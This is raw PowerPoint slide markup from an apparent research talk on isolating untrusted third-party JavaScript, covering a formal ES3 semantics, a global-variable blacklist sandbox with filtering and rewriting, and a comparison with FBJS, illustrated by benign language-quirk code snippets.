            <a:ext cx="533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Mediated Access (ES5-strict)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2236113"/>
            <a:ext cx="533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Inter-Component Isolation (ES3)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3455313"/>
            <a:ext cx="5334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Hosting-Page Isolation (ES3)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284113"/>
            <a:ext cx="5264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Formal framework for JavaScript (ES3)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1093113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Attacks found by us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9" grpId="0" animBg="1"/>
      <p:bldP spid="39" grpId="1" animBg="1"/>
      <p:bldP spid="43" grpId="0" animBg="1"/>
      <p:bldP spid="43" grpId="1" animBg="1"/>
      <p:bldP spid="53" grpId="0" animBg="1"/>
      <p:bldP spid="53" grpId="1" animBg="1"/>
      <p:bldP spid="56" grpId="0" animBg="1"/>
      <p:bldP spid="56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8" grpId="0" animBg="1"/>
      <p:bldP spid="78" grpId="1" animBg="1"/>
      <p:bldP spid="85" grpId="0"/>
      <p:bldP spid="90" grpId="0"/>
      <p:bldP spid="90" grpId="1"/>
      <p:bldP spid="91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2286000"/>
            <a:ext cx="6858000" cy="18288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Hosting Page Isolation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Page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14800" y="2450632"/>
            <a:ext cx="4953000" cy="1740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does not access a given set of security-critical resources</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="laptop"/>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="76200" y="19050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05256" y="20299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3106971"/>
            <a:ext cx="1889412" cy="626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Security-critical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resources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5252" y="3669268"/>
            <a:ext cx="14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Hosting page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1371600" y="2133600"/>
            <a:ext cx="1889412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Sandboxed code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2115308" y="2633738"/>
            <a:ext cx="399292" cy="416976"/>
            <a:chOff x="2432209" y="2170327"/>
            <a:chExt cx="434793" cy="496673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2380564" y="2418663"/>
              <a:ext cx="496673" cy="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31"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="2700000">
              <a:off x="2460550" y="2162198"/>
              <a:ext cx="378112" cy="434793"/>
              <a:chOff x="-1153403" y="-450653"/>
              <a:chExt cx="1142997" cy="102073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14640000">
                <a:off x="-1130373" y="-383125"/>
                <a:ext cx="1020737" cy="885682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2600000" flipV="1">
                <a:off x="-1153403" y="-344769"/>
                <a:ext cx="1142997" cy="875927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Page Isolation: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Semantics for JavaScript (ES3)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Sandboxing technique</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Comparison with FBJS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Web 2.0: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1" smtClean="0"/>
              <a:t>Webpages</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t> with third-party content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829" t="9195" r="9515" b="20307"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5943600" y="1552039"/>
            <a:ext cx="3048000" cy="197653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8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="3657600"/>
            <a:ext cx="8915400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lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>Third-party content often contains executable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t> code (AJAX)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="740664" lvl="1" indent="-283464">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>manipulates features of hosting page, reacts to user events, talks to servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="740664" lvl="1" indent="-283464">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>provides a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rich user-experience</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="283464" indent="-283464">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>Third-party content is often </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>untrusted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="740664" lvl="1" indent="-283464">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="283464" indent="-283464"/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9" name="Oval 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7848600" y="1694814"/>
            <a:ext cx="990600" cy="543026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" name="Picture 9" descr="admash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1929"/>
            <a:ext cx="3113314" cy="2152579"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10" descr="yel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466214"/>
            <a:ext cx="2956578" cy="21913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1009014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Ads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1009014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Maps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1020682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Social-Networking Apps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76200" y="5486400"/>
            <a:ext cx="8991600" cy="565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rgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This Work</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:  Study methods for safely embedding untrusted third-party JavaScript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JavaScript (ES3)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 marL="374904" indent="-283464">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3097" dirty="0" smtClean="0"/>
              <a:t>Developed by Brendan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3097" dirty="0" err="1" smtClean="0"/>
              <a:t>Eich</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3097" dirty="0" smtClean="0"/>
              <a:t> in 1995, inspired by Self</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="731520" lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2839" dirty="0" smtClean="0"/>
              <a:t>First-class functions, hash table like objects</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="731520" lvl="1">
              <a:buNone/>
            </a:pP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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="257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var</a:t>
            </a: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57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o</a:t>
            </a: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{}; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="257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o.foo</a:t>
            </a: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function(){}; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="257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o[“foo</a:t>
            </a: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”]();</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2571" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="731520" lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2839" dirty="0" smtClean="0"/>
              <a:t>Prototype-based inheritance, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2839" dirty="0" smtClean="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>built-in prototype objects provided by the environment, e.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="258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Object.prototype</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2581" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="731520" lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2839" dirty="0" smtClean="0"/>
              <a:t>Dynamic code generation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="731520" lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2571" dirty="0" smtClean="0"/>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="257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eval(“x</a:t>
            </a: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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2571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x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2571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+ 1;”)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2571" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="731520" lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2839" dirty="0" smtClean="0"/>
              <a:t>Scopes as first-class objects</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="731520" lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2571" dirty="0" smtClean="0"/>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2571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sz="2571" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="376092"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2571" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="376092"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2571" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="376092"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> = {x:1}; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2571" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="376092"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>with(o){x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2571" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="376092"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> = 2}; // sets </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2571" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="376092"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>o.x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2571" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="376092"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> to 2!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2571" dirty="0" smtClean="0"/>
              <a:t>	   	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="374904" indent="-283464">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3097" dirty="0" smtClean="0"/>
              <a:t>Peculiarities:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2839" dirty="0" smtClean="0"/>
              <a:t>very few (run-time) type errors:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2571" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C0504D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2571" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C0504D"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2571" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C0504D"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> = “a” +  {} ; // runs perfectly!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2571" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="C0504D"/>
              </a:solidFill>
              <a:latin typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2839" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>unrolling of while loops is NOT semantics preserving</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2839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</a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2571" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C0504D"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2571" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C0504D"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>while(e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2571" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C0504D"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>){ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2571" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C0504D"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2571" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C0504D"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> }    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2571" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C0504D"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
                <a:sym typeface="Symbol" charset="2"/>
              </a:rPr>
              <a:t>if(e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2571" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C0504D"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
                <a:sym typeface="Symbol" charset="2"/>
              </a:rPr>
              <a:t>){ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2571" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C0504D"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
                <a:sym typeface="Symbol" charset="2"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2571" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C0504D"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
                <a:sym typeface="Symbol" charset="2"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2571" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C0504D"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>while(e){s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2571" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C0504D"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>} </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2571" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C0504D"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
                <a:sym typeface="Symbol" charset="2"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2839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buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2839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buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Symbol" charset="2"/>
            </a:endParaRP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8775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Courier" charset="0"/>
                <a:sym typeface="Symbol" charset="2"/>
              </a:rPr>
              <a:t>≠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Semantics for JavaScript (ES3)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5050"/>
            <a:ext cx="8991600" cy="5518150"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="283464" indent="-283464">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Developing a semantics for a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>real</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t> language is hard!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/>
              <a:t>sheer size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/>
              <a:t>further, JavaScript is full of surprises!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="283464" indent="-283464">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>We developed a small-step operational semantics [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1" smtClean="0"/>
              <a:t>Plotkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>]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based on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edition of the ECMA-262 specification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/>
              <a:t>does not model the DOM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/>
              <a:t>very long (70 pages in ASCII), took 6 man-months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/>
              <a:t>spotted lots of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0"/>
              <a:t>descripencies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t> across browsers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1946" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="283464" indent="-283464">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Proved sanity-check properties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Theorem 1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Execution of well-formed terms never gets stuck</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="125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Theorem 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>: Execution of a term only depends on the reachable heap locations  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="283464" indent="-283464">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Related work using our semantics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[Smith et al., POPL’12] , [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0"/>
              <a:t>Fredrikson</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t> et al., 2012]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Page Isolation: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Operational Semantics for JavaScript (ES3)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Sandboxing technique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Comparison with FBJS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4082816"/>
            <a:ext cx="8686800" cy="10225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does not access a given set of security-critical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Design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838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Construct a blacklist </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t> of global variables from which security-critical objects are reachable, e.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>  = { </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="376092"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>“window”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“document”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>, …}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2133600"/>
            <a:ext cx="88392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does not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>access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any global variables from a given blacklist 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B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3238500"/>
            <a:ext cx="8001000" cy="1409700"/>
            <a:chOff x="304800" y="2781300"/>
            <a:chExt cx="8001000" cy="1409700"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="8" name="Group 32"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4419605" y="2781300"/>
              <a:ext cx="1498595" cy="1409700"/>
              <a:chOff x="4419600" y="5181600"/>
              <a:chExt cx="1284509" cy="1104900"/>
            </a:xfrm>
            <a:effectLst/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="14" name="Manual Operation 13"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="5400000">
                <a:off x="4438650" y="5162550"/>
                <a:ext cx="1104900" cy="1143000"/>
              </a:xfrm>
              <a:prstGeom prst="flowChartManualOperati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84910" y="5401272"/>
                <a:ext cx="1219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Filter &amp; Rewriter</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="2400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 rot="10800000">
              <a:off x="5871497" y="3294887"/>
              <a:ext cx="910303" cy="36271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3241357"/>
              <a:ext cx="1295400" cy="49244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276600" y="3276600"/>
              <a:ext cx="910303" cy="36271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2895600"/>
              <a:ext cx="2895599" cy="1295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rew(s</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2600" i="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent2"/>
                  </a:solidFill>
                  <a:latin typeface="Times"/>
                  <a:cs typeface="Times"/>
                </a:rPr>
                <a:t>)</a:t>
              </a:r>
            </a:p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Calibri"/>
                  <a:cs typeface="Calibri"/>
                </a:rPr>
                <a:t>does not access global variables from </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2200" i="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Times"/>
                  <a:cs typeface="Times"/>
                </a:rPr>
                <a:t>B</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2200" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="376092"/>
                </a:solidFill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3745468"/>
              <a:ext cx="129540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Third-party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Simple Approach: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>do a static scope analysis to determine which identifiers resolve to global variables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What global variables does a given JS program access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572000" cy="3276600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 marL="0"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var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x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42; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL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function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>foo</a:t>
            </a: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(){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL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	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>var</a:t>
            </a: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Courier"/>
                <a:cs typeface="Courier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 = 21; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL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&lt;some code&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL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	return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier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;}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0"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Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill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1109" y="2510135"/>
            <a:ext cx="29440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delete </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>x</a:t>
            </a:r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;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400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3424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// returns 42</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400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510135"/>
            <a:ext cx="3075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x = </a:t>
            </a:r>
            <a:r>
